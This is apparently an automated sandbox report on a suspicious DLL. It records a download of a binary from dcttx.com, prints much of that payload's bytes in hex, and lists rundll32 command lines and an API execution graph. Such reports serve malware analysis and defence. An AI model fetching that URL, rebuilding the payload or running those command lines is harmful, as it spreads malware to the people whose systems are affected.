                            2024-12-22 08:29:05 UTC27INData Raw: 68 74 74 70 73 3a 2f 2f 64 63 74 74 78 2e 63 6f 6d 2f 31 39 2f 37 37 2e 62 69 6e
                            Data Ascii: https://dcttx.com/19/77.bin


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.44973538.147.186.1384431900C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            2024-12-22 08:29:06 UTC57OUTGET /19/77.bin HTTP/1.1
                            accept: */*
                            host: dcttx.com
                            2024-12-22 08:29:07 UTC291INHTTP/1.1 200 OK
                            Server: nginx
                            Date: Sun, 22 Dec 2024 08:29:07 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 140288
                            Last-Modified: Thu, 19 Dec 2024 15:27:56 GMT
                            Connection: close
                            ETag: "67643b7c-22400"
                            Strict-Transport-Security: max-age=31536000
                            Accept-Ranges: bytes
                            2024-12-22 08:29:07 UTC16093INData Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 50 05 00 20 02 00 ff d0 c3 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e2 0c 41 1d a6 6d 2f 4e a6 6d 2f 4e a6 6d 2f 4e c9 1b b1 4e b2 6d 2f 4e c9 1b 85 4e d0 6d 2f 4e c9 1b 84 4e 8a 6d 2f 4e af 15 bc 4e ad 6d 2f 4e a6 6d 2e 4e 29 6d 2f 4e c9 1b 80 4e ab 6d 2f 4e c9 1b b2 4e a7 6d 2f 4e 52 69 63 68 a6 6d 2f 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 74 12 b6 66 00 00 00 00 00 00 00 00 e0 00 02
                            Data Ascii: MZERXP @!L!This program cannot be run in DOS mode.$Am/Nm/Nm/NNm/NNm/NNm/NNm/Nm.N)m/NNm/NNm/NRichm/NPELtf
                            2024-12-22 08:29:07 UTC16384INData Raw: 08 89 4b 04 89 9e 80 01 00 00 ff 86 78 01 00 00 57 89 9e 7c 01 00 00 ff 15 24 50 41 00 b8 01 00 00 00 5f 5b 8b e5 5d c3 b9 01 00 00 00 53 8d be 98 00 00 00 89 4e 30 c7 46 34 03 00 00 00 89 46 38 89 4e 3c e8 5a d5 ff ff 85 c0 75 0d 8b 13 53 50 8b 02 50 ff 15 e4 50 41 00 5f 33 c0 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b f0 ff 15 4c 50 41 00 8b d8 8b 46 64 83 f8 03 0f 84 cf 00 00 00 8d be 5c 01 00 00 57 e8 0b ec ff ff 8b 4e 64 83 f9 01 74 0b 8b 56 64 85 d2 0f 85 aa 00 00 00 c7 46 64 02 00 00 00 c7 07 00 00 00 00 8b c3 e8 b4 01 00 00 8b 46 60 85 c0 74 20 83 7e 3c 00 74 13 8b 4e 40 6a 00 6a 10 68 40 74 41 00 51 ff 15 f4 51 41 00 c7 46 60 00 00 00 00 83 7e 30 00 74 22 8b 56 48 52 e8 7e ec ff ff 8b 46 04 83 c4 04 50 ff 15 38
                            Data Ascii: KxW|$PA_[]SN0F4F8N<ZuSPPPA_3[]SVWLPAFd\WNdtVdFdF`t ~<tN@jjh@tAQQAF`~0t"VHR~FP8
                            2024-12-22 08:29:07 UTC16384INData Raw: 00 dd 5d f8 dd 45 f8 59 dd 45 08 59 da e9 df e0 f6 c4 44 7a 0e 56 53 e8 18 40 00 00 dd 45 f8 59 59 eb 22 f6 c3 20 75 ed dd 45 f8 53 83 ec 10 dd 5c 24 08 dd 45 08 dd 1c 24 6a 0c 6a 10 e8 9d 3d 00 00 83 c4 1c 5e 5b c9 c3 6a 0c 68 a0 7b 41 00 e8 7e 1f 00 00 6a 0e e8 47 42 00 00 59 83 65 fc 00 8b 75 08 8b 4e 04 85 c9 74 2f a1 b4 ae 41 00 ba b0 ae 41 00 89 45 e4 85 c0 74 11 39 08 75 2c 8b 48 04 89 4a 04 50 e8 a0 f0 ff ff 59 ff 76 04 e8 97 f0 ff ff 59 83 66 04 00 c7 45 fc fe ff ff ff e8 0a 00 00 00 e8 6d 1f 00 00 c3 8b d0 eb c5 6a 0e e8 13 41 00 00 59 c3 cc cc cc cc cc cc cc cc cc cc 8b 54 24 04 8b 4c 24 08 f7 c2 03 00 00 00 75 3c 8b 02 3a 01 75 2e 0a c0 74 26 3a 61 01 75 25 0a e4 74 1d c1 e8 10 3a 41 02 75 19 0a c0 74 11 3a 61 03 75 10 83 c1 04 83 c2 04 0a e4
                            Data Ascii: ]EYEYDzVS@EYY" uES\$E$jj=^[jh{A~jGBYeuNt/AAEt9u,HJPYvYfEmjAYT$L$u<:u.t&:au%t:Aut:au
                            2024-12-22 08:29:07 UTC16384INData Raw: 07 00 00 83 c4 0c 81 ea fe 03 00 00 8b 45 10 89 10 5d c3 8b ff 55 8b ec 51 9b dd 7d fc 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 dd 7d fc db e2 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 9b d9 7d fc 8b 45 0c 8b 4d 08 23 4d 0c f7 d0 66 23 45 fc 66 0b c1 0f b7 c0 89 45 0c d9 6d 0c 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 51 8a 4d 08 f6 c1 01 74 0a db 2d 30 93 41 00 db 5d 08 9b f6 c1 08 74 10 9b df e0 db 2d 30 93 41 00 dd 5d f8 9b 9b df e0 f6 c1 10 74 0a db 2d 3c 93 41 00 dd 5d f8 9b f6 c1 04 74 09 d9 ee d9 e8 de f1 dd d8 9b f6 c1 20 74 06 d9 eb dd 5d f8 9b c9 c3 6a 08 68 50 7c 41 00 e8 10 df ff ff 33 c0 39 05 dc eb 41 00 74 56 f6 45 08 40 74 48 39 05 48 93 41 00 74 40 89 45 fc 0f ae 55 08 eb 2e 8b 45 ec 8b 00 8b 00 3d 05 00 00 c0 74 0a 3d 1d 00 00 c0 74 03 33 c0 c3 33 c0 40
                            Data Ascii: E]UQ}EUQ}EUQ}EM#Mf#EfEmEUQQMt-0A]t-0A]t-<A]t t]jhP|A39AtVE@tH9HAt@EU.E=t=t33@
                            2024-12-22 08:29:08 UTC16384INData Raw: ff ff ff b6 84 00 00 00 e8 1f 71 ff ff ff b6 88 00 00 00 e8 14 71 ff ff ff b6 8c 00 00 00 e8 09 71 ff ff ff b6 90 00 00 00 e8 fe 70 ff ff ff b6 94 00 00 00 e8 f3 70 ff ff ff b6 98 00 00 00 e8 e8 70 ff ff ff b6 9c 00 00 00 e8 dd 70 ff ff ff b6 a0 00 00 00 e8 d2 70 ff ff ff b6 a4 00 00 00 e8 c7 70 ff ff ff b6 a8 00 00 00 e8 bc 70 ff ff ff b6 bc 00 00 00 e8 b1 70 ff ff ff b6 c0 00 00 00 e8 a6 70 ff ff ff b6 c4 00 00 00 e8 9b 70 ff ff ff b6 c8 00 00 00 e8 90 70 ff ff ff b6 cc 00 00 00 e8 85 70 ff ff 83 c4 40 ff b6 d0 00 00 00 e8 77 70 ff ff ff b6 b8 00 00 00 e8 6c 70 ff ff ff b6 d8 00 00 00 e8 61 70 ff ff ff b6 dc 00 00 00 e8 56 70 ff ff ff b6 e0 00 00 00 e8 4b 70 ff ff ff b6 e4 00 00 00 e8 40 70 ff ff ff b6 e8 00 00 00 e8 35 70 ff ff ff b6 ec 00 00 00 e8 2a
                            Data Ascii: qqqpppppppppppp@wplpapVpKp@p5p*
                            2024-12-22 08:29:08 UTC16384INData Raw: 75 f8 53 ff 75 14 ff 75 10 ff 75 0c 56 e8 9f fb ff ff 83 c4 20 e8 3c 5b ff ff 83 b8 94 00 00 00 00 74 05 e8 59 84 ff ff 5f 5e 5b c9 c3 8b ff 55 8b ec 56 ff 75 08 8b f1 e8 ca 30 ff ff c7 06 88 77 41 00 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 53 56 57 e8 ff 5a ff ff 83 b8 0c 02 00 00 00 8b 45 18 8b 4d 08 bf 63 73 6d e0 be ff ff ff 1f bb 22 05 93 19 75 20 8b 11 3b d7 74 1a 81 fa 26 00 00 80 74 12 8b 10 23 d6 3b d3 72 0a f6 40 20 01 0f 85 93 00 00 00 f6 41 04 66 74 23 83 78 04 00 0f 84 83 00 00 00 83 7d 1c 00 75 7d 6a ff 50 ff 75 14 ff 75 0c e8 7a f4 ff ff 83 c4 10 eb 6a 83 78 0c 00 75 12 8b 10 23 d6 81 fa 21 05 93 19 72 58 83 78 1c 00 74 52 39 39 75 32 83 79 10 03 72 2c 39 59 14 76 27 8b 51 1c 8b 52 08 85 d2 74 1d 0f b6 75 24 56 ff 75 20 ff 75 1c 50 ff 75 14 ff
                            Data Ascii: uSuuuV <[tY_^[UVu0wA^]USVWZEMcsm"u ;t&t#;r@ Aft#x}u}jPuuzjxu#!rXxtR99u2yr,9Yv'QRtu$Vu uPu
                            2024-12-22 08:29:08 UTC16384INData Raw: 00 00 00 ff ff ff ff b0 40 41 00 00 00 00 00 bb 40 41 00 01 00 00 00 c6 40 41 00 02 00 00 00 d1 40 41 00 03 00 00 00 de 40 41 00 04 00 00 00 ec 40 41 00 05 00 00 00 f9 40 41 00 06 00 00 00 06 41 41 00 07 00 00 00 13 41 41 00 07 00 00 00 1e 41 41 00 09 00 00 00 2c 41 41 00 0a 00 00 00 3a 41 41 00 0b 00 00 00 48 41 41 00 22 05 93 19 0d 00 00 00 e0 7e 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 80 41 41 00 00 00 00 00 8b 41 41 00 22 05 93 19 02 00 00 00 6c 7f 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff c0 41 41 00 ff ff ff ff cb 41 41 00 22 05 93 19 02 00 00 00 a0 7f 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff f0 41 41 00
                            Data Ascii: @A@A@A@A@A@A@AAAAAAA,AA:AAHAA"~AAAAA"lAAAAA"AAA
                            2024-12-22 08:29:08 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii:
                            2024-12-22 08:29:08 UTC9507INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii:


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:03:28:59
                            Start date:22/12/2024
                            Path:C:\Windows\System32\loaddll32.exe
                            Wow64 process (32bit):true
                            Commandline:loaddll32.exe "C:\Users\user\Desktop\HLMJbase.dll"
                            Imagebase:0xe30000
                            File size:126'464 bytes
                            MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:1
                            Start time:03:28:59
                            Start date:22/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:2
                            Start time:03:28:59
                            Start date:22/12/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1
                            Imagebase:0x240000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:3
                            Start time:03:28:59
                            Start date:22/12/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe C:\Users\user\Desktop\HLMJbase.dll,NvOptimusEnablement
                            Imagebase:0x260000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:4
                            Start time:03:28:59
                            Start date:22/12/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1
                            Imagebase:0x260000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:5
                            Start time:03:29:02
                            Start date:22/12/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",NvOptimusEnablement
                            Imagebase:0x260000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Reset < >

                              Execution Graph

                              Execution Coverage:4.4%
                              Dynamic/Decrypted Code Coverage:9.6%
                              Signature Coverage:13.8%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:65
                              execution_graph 107795 42032e0 6 API calls 107796 6cc0ca81 107799 6cc0ca8e 107796->107799 107800 6cc0caa9 107799->107800 107801 6cc0cace 107799->107801 107811 6cc11c98 107800->107811 107924 6cc6099b 107800->107924 107928 6cc62230 26 API calls 107801->107928 107803 6cc0caab 107804 6cc0ca8a 107803->107804 107927 6cbfa65c RtlFreeHeap 107803->107927 107929 6cc11744 107811->107929 107814 6cc11ce5 107932 6cc46a1a 107814->107932 107817 6cc11d13 107936 6cc0c93d 107817->107936 107818 6cc11cff 107935 6cc01091 26 API calls 107818->107935 107821 6cc11d0a 107823 6cc6099b RegCloseKey 107821->107823 107822 6cc11d2e 107826 6cc11d93 107822->107826 107828 6cc0c93d 27 API calls 107822->107828 107824 6cc11dcf 107823->107824 107829 6cc11df1 107824->107829 107950 6cbc5ad0 107824->107950 107949 6cc01091 26 API calls 107826->107949 107836 6cc11d88 107828->107836 107953 6cc12795 26 API calls 107829->107953 107833 6cc11db8 107835 6cc6099b RegCloseKey 107833->107835 107834 6cc11dfa 107954 6cc4d120 26 API calls 107834->107954 107835->107821 107836->107826 107879 6cc12745 107836->107879 107985 6cc608d4 26 API calls 107836->107985 107839 6cc12759 107839->107826 107842 6cc12767 107839->107842 107841 6cc11e0f 107843 6cc11e52 107841->107843 107844 6cc11e18 107841->107844 107845 6cc12775 107842->107845 108004 6cbf5758 RtlFreeHeap 107842->108004 107957 6cbf5758 RtlFreeHeap 107843->107957 107955 6cc127e7 40 API calls 107844->107955 107850 6cc6099b RegCloseKey 107845->107850 107848 6cc11e2f 107851 6cc11e4d 107848->107851 107956 6cc127e7 40 API calls 107848->107956 107852 6cc12786 107850->107852 107958 6cc127e7 40 API calls 107851->107958 107855 6cc6099b RegCloseKey 107852->107855 107855->107829 107856 6cc11e75 107857 6cc11e93 107856->107857 107959 6cc127e7 40 API calls 107856->107959 107960 6cc127e7 40 API calls 107857->107960 107858 6cc12509 107868 6cc12715 107858->107868 107858->107879 107885 6cc609a7 27 API calls 107858->107885 107862 6cc122ab 107862->107858 107986 6cc60970 26 API calls 107862->107986 107987 6cc608d4 26 API calls 107862->107987 107863 6cc11ead 107869 6cc11ecb 107863->107869 107961 6cc127e7 40 API calls 107863->107961 107867 6cc123f6 memmove 107867->107862 108001 6cc609a7 27 API calls 107868->108001 107872 6cc11f10 107869->107872 107962 6cc127e7 40 API calls 107869->107962 107870 6cc11eee 107963 6cc127e7 40 API calls 107870->107963 107875 6cc11fd7 107872->107875 107878 6cc11f63 107872->107878 107874 6cc12731 108002 6cbf5758 RtlFreeHeap 107874->108002 107877 6cc12024 107875->107877 107967 6cbf5758 RtlFreeHeap 107875->107967 107996 6cbe7564 107877->107996 107964 6cc12795 26 API calls 107878->107964 108003 6cc0ca21 RtlFreeHeap 107879->108003 107884 6cc11f81 107887 6cc11f8a 107884->107887 107968 6cc60b07 107884->107968 107885->107858 107888 6cc12042 107887->107888 107889 6cc11f9f 107887->107889 107971 6cc128d2 27 API calls 107888->107971 107965 6cc12831 27 API calls 107889->107965 107892 6cc11fa8 107893 6cc11fb2 107892->107893 107894 6cc12468 107892->107894 107966 6cbc6540 27 API calls 107893->107966 107988 6cc11b74 28 API calls 107894->107988 107895 6cc12502 107994 6cbf5758 RtlFreeHeap 107895->107994 107899 6cc11fc2 107991 6cc128f9 40 API calls 107899->107991 107900 6cc124a8 107989 6cc128f9 40 API calls 107900->107989 107902 6cc125e6 107995 6cc3f952 RtlFreeHeap 107902->107995 107905 6cc124bc 107990 6cc11b74 28 API calls 107905->107990 107909 6cc1252e 107911 6cc12571 107909->107911 107992 6cc3f993 RtlFreeHeap 107909->107992 107993 6cc551ce RtlFreeHeap 107911->107993 107914 6cc072e6 26 API calls 107921 6cc12056 107914->107921 107915 6cc12552 107915->107911 107916 6cc12559 memset 107915->107916 107916->107911 107921->107895 107921->107909 107921->107914 107972 6cc08418 26 API calls 107921->107972 107973 6cc128d2 27 API calls 107921->107973 107974 6cc465d5 107921->107974 107979 6cc602f3 26 API calls 107921->107979 107980 6cc12831 27 API calls 107921->107980 107981 6cbf7118 28 API calls 107921->107981 107982 6cc11b74 28 API calls 107921->107982 107983 6cc128f9 40 API calls 107921->107983 107984 6cc551ce RtlFreeHeap 107921->107984 107925 6cc609a6 107924->107925 107926 6cc6099f RegCloseKey 107924->107926 107925->107803 107926->107925 107927->107804 108005 6cc46706 107929->108005 108012 6cc60989 107932->108012 107935->107821 107937 6cc11744 26 API calls 107936->107937 107938 6cc0c95a 107937->107938 108016 6cc5b59e 107938->108016 107940 6cc0c976 107941 6cc0c98c RegQueryValueExW 107940->107941 108021 6cbce4eb 26 API calls 107940->108021 107941->107940 107942 6cc0c9b5 107941->107942 107944 6cc0c9f3 107942->107944 108022 6cbf5758 RtlFreeHeap 107942->108022 107946 6cc46a1a RtlFreeHeap 107944->107946 107947 6cc0ca19 107946->107947 107947->107822 107948 6cc0ca21 RtlFreeHeap 107947->107948 107948->107822 107949->107833 107951 6cbc5ad8 RtlFreeHeap 107950->107951 107952 6cbc5ad5 107950->107952 107951->107829 107952->107951 107953->107834 107954->107841 107955->107848 107956->107851 107957->107851 107958->107856 107959->107857 107960->107863 107961->107869 107962->107870 107963->107872 107964->107884 107965->107892 107966->107899 107967->107877 107969 6cc60b21 107968->107969 107970 6cc60b0d memcmp 107968->107970 107969->107887 107970->107887 107971->107921 107972->107921 107973->107921 107975 6cc467e8 3 API calls 107974->107975 107976 6cc465eb 107975->107976 107977 6cc465f5 107976->107977 108029 6cc61e20 26 API calls 107976->108029 107977->107921 107979->107921 107980->107921 107981->107921 107982->107921 107983->107921 107984->107921 107985->107862 107986->107862 107987->107867 107988->107900 107989->107905 107990->107899 107991->107895 107992->107915 107993->107895 107994->107902 107995->107877 108030 6cbc5a90 107996->108030 107999 6cbe7578 107999->107803 108001->107874 108002->107879 108003->107839 108004->107845 108007 6cc46718 108005->108007 108006 6cc11768 RegOpenKeyExW 108006->107814 108007->108006 108008 6cc465d5 26 API calls 108007->108008 108009 6cc46750 108008->108009 108009->108006 108011 6cc46609 26 API calls 108009->108011 108011->108009 108013 6cc6098d 108012->108013 108014 6cc11cfb 108012->108014 108015 6cbc5ad0 RtlFreeHeap 108013->108015 108014->107817 108014->107818 108015->108014 108023 6cc467e8 108016->108023 108019 6cc5b5bc 108019->107940 108021->107940 108022->107944 108024 6cc46822 108023->108024 108025 6cc46819 108023->108025 108024->108025 108028 6cbce49a RtlAllocateHeap GetProcessHeap HeapAlloc 108024->108028 108025->108019 108027 6cc61e20 26 API calls 108025->108027 108028->108025 108031 6cbc5a9b 108030->108031 108032 6cbc5aa4 108030->108032 108037 6cc50110 108031->108037 108034 6cc50110 3 API calls 108032->108034 108035 6cbc5aa2 108034->108035 108035->107999 108036 6cc61e40 26 API calls 108035->108036 108038 6cc50127 108037->108038 108039 6cc5011c RtlAllocateHeap 108037->108039 108042 6cc65070 GetProcessHeap HeapAlloc 108038->108042 108039->108035 108041 6cc5012c 108041->108035 108042->108041 108043 6cc584e7 108055 6cc58538 108043->108055 108045 6cc58692 108046 6cc586df 108075 6cc62170 26 API calls 108046->108075 108047 6cc586f1 108076 6cc625b0 26 API calls 108047->108076 108048 6cc58588 recv 108050 6cc585a0 WSAGetLastError 108048->108050 108048->108055 108050->108055 108052 6cc586ae 108053 6cc586ca 108052->108053 108077 6cc625d0 108052->108077 108053->108045 108080 6cc62230 26 API calls 108053->108080 108055->108045 108055->108046 108055->108047 108055->108048 108055->108052 108060 6cbf5588 RtlFreeHeap 108055->108060 108061 6cc57d41 108055->108061 108072 6cc57cef 26 API calls 108055->108072 108073 6cbe7fe5 RtlFreeHeap 108055->108073 108074 6cbf4da7 35 API calls 108055->108074 108060->108055 108081 6cc2675a 108061->108081 108064 6cc57d5b 108064->108055 108065 6cc57d95 108069 6cc57e8f 108065->108069 108095 6cbf58f1 27 API calls 108065->108095 108096 6cc579d5 26 API calls 108069->108096 108071 6cc57dc2 108094 6cc05199 39 API calls 108071->108094 108072->108055 108073->108055 108074->108055 108109 6cc62230 26 API calls 108077->108109 108097 6cc5755c 108081->108097 108084 6cc26772 108084->108064 108084->108065 108086 6cc051a8 108084->108086 108087 6cc051b6 108086->108087 108093 6cc63a84 108086->108093 108087->108071 108088 6cc63aa8 108088->108071 108089 6cc63c1c Sleep 108089->108093 108093->108088 108093->108089 108106 6cbf6c37 39 API calls 108093->108106 108107 6cbf61a2 39 API calls 108093->108107 108108 6cc63e6d 39 API calls 108093->108108 108094->108065 108095->108069 108096->108064 108101 6cc57511 108097->108101 108100 6cc579d5 26 API calls 108100->108084 108102 6cc26760 108101->108102 108103 6cc5752d 108101->108103 108102->108084 108102->108100 108103->108102 108105 6cc6577d 26 API calls 108103->108105 108105->108102 108106->108093 108107->108093 108108->108093 108110 42077a2 108111 42077ae __lseeki64 108110->108111 108112 42077b8 HeapSetInformation 108111->108112 108114 42077c3 108111->108114 108112->108114 108156 420811b HeapCreate 108114->108156 108115 4207811 108116 420781c 108115->108116 108164 4207779 66 API calls 3 library calls 108115->108164 108165 4209bea 86 API calls 4 library calls 108116->108165 108119 4207822 108120 4207826 108119->108120 108121 420782e __RTC_Initialize 108119->108121 108166 4207779 66 API calls 3 library calls 108120->108166 108157 420b2f6 73 API calls __calloc_crt 108121->108157 108123 420782d 108123->108121 108125 420783b 108126 4207847 GetCommandLineW 108125->108126 108127 420783f 108125->108127 108158 420b29e 68 API calls __malloc_crt 108126->108158 108167 4208406 66 API calls 3 library calls 108127->108167 108130 4207857 108168 420b1f0 67 API calls 2 library calls 108130->108168 108133 4207861 108134 4207865 108133->108134 108135 420786d 108133->108135 108169 4208406 66 API calls 3 library calls 108134->108169 108159 420afbe 66 API calls 5 library calls 108135->108159 108139 4207872 108140 4207876 108139->108140 108141 420787e 108139->108141 108170 4208406 66 API calls 3 library calls 108140->108170 108160 42081e5 77 API calls 4 library calls 108141->108160 108144 4207885 108146 4207891 108144->108146 108147 420788a 108144->108147 108161 4206530 6 API calls 108146->108161 108171 4208406 66 API calls 3 library calls 108147->108171 108151 42078ad 108152 42078be 108151->108152 108172 42083bc 66 API calls _doexit 108151->108172 108173 42083e8 66 API calls _doexit 108152->108173 108155 42078c3 __lseeki64 108156->108115 108157->108125 108158->108130 108159->108139 108160->108144 108174 4205e40 108161->108174 108164->108116 108165->108119 108166->108123 108168->108133 108172->108152 108173->108155 108175 4205e53 _memset 108174->108175 108222 4206116 CreateThread WaitForSingleObject CloseHandle Sleep 108174->108222 108241 4205d70 108175->108241 108177 4205e87 108178 4205d70 3 API calls 108177->108178 108179 4205e98 108178->108179 108180 4205d70 3 API calls 108179->108180 108181 4205ea9 108180->108181 108182 4205d70 3 API calls 108181->108182 108183 4205eba 108182->108183 108184 4205d70 3 API calls 108183->108184 108185 4205ece 108184->108185 108186 4205d70 3 API calls 108185->108186 108187 4205edf 108186->108187 108188 4205d70 3 API calls 108187->108188 108189 4205ef0 108188->108189 108190 4205d70 3 API calls 108189->108190 108191 4205f01 108190->108191 108192 4205d70 3 API calls 108191->108192 108193 4205f12 108192->108193 108194 4205d70 3 API calls 108193->108194 108195 4205f23 108194->108195 108196 4205d70 3 API calls 108195->108196 108197 4205f37 108196->108197 108198 4205d70 3 API calls 108197->108198 108199 4205f48 108198->108199 108200 4205d70 3 API calls 108199->108200 108222->108151 108246 4206120 108222->108246 108242 4205d87 lstrlenW 108241->108242 108243 4205d9a lstrlenW lstrlenW 108241->108243 108244 4205d97 _memset 108242->108244 108245 4205db3 108243->108245 108244->108243 108245->108177 108266 4207734 108246->108266 108251 420617b 108253 42070d7 77 API calls 108251->108253 108254 420618d 108253->108254 108256 42061a0 108254->108256 108282 4205a30 CreateEventW 108254->108282 108257 4207734 67 API calls 108256->108257 108259 4207228 66 API calls __wsetenvp 108256->108259 108261 4206308 CreateEventA 108256->108261 108307 4202d80 ResetEvent InterlockedExchange timeGetTime socket 108256->108307 108258 42062b7 Sleep 108257->108258 108260 4207734 67 API calls 108258->108260 108259->108256 108260->108256 108328 4203140 GetCurrentThreadId 108261->108328 108267 420771e 108266->108267 108344 420af52 108267->108344 108270 42070d7 108271 42070e1 108270->108271 108273 420616d 108271->108273 108278 42070fd std::exception::exception 108271->108278 108362 4207043 108271->108362 108379 4208641 DecodePointer 108271->108379 108273->108251 108343 4202c60 8 API calls __cftog_l 108273->108343 108275 420713b 108381 4206fe4 66 API calls std::exception::operator= 108275->108381 108277 4207145 108382 420790d RaiseException 108277->108382 108278->108275 108380 42075a9 76 API calls __cinit 108278->108380 108281 4207156 108283 4205a93 108282->108283 108284 4205a89 108282->108284 108391 42065d0 HeapCreate 108283->108391 108397 4201280 DeleteCriticalSection RaiseException __CxxThrowException@8 108284->108397 108288 4205b22 108398 4201280 DeleteCriticalSection RaiseException __CxxThrowException@8 108288->108398 108289 4205b2c CreateEventW 108291 4205b65 108289->108291 108292 4205b6f CreateEventW 108289->108292 108399 4201280 DeleteCriticalSection RaiseException __CxxThrowException@8 108291->108399 108294 4205b94 CreateEventW 108292->108294 108295 4205b8a 108292->108295 108297 4205bb9 InitializeCriticalSectionAndSpinCount 108294->108297 108298 4205baf 108294->108298 108400 4201280 DeleteCriticalSection RaiseException __CxxThrowException@8 108295->108400 108300 4205c87 InitializeCriticalSectionAndSpinCount 108297->108300 108301 4205c7d 108297->108301 108401 4201280 DeleteCriticalSection RaiseException __CxxThrowException@8 108298->108401 108303 4205ca8 InterlockedExchange timeGetTime CreateEventW CreateEventW 108300->108303 108304 4205c9e 108300->108304 108402 4201280 DeleteCriticalSection RaiseException __CxxThrowException@8 108301->108402 108306 4205d3b 108303->108306 108403 4201280 DeleteCriticalSection RaiseException __CxxThrowException@8 108304->108403 108306->108256 108308 4202de8 108307->108308 108309 4202dfc lstrlenW WideCharToMultiByte 108307->108309 108407 42069d5 5 API calls __call_reportfault 108308->108407 108406 42069bf 108309->108406 108312 4202df6 108312->108256 108329 4203158 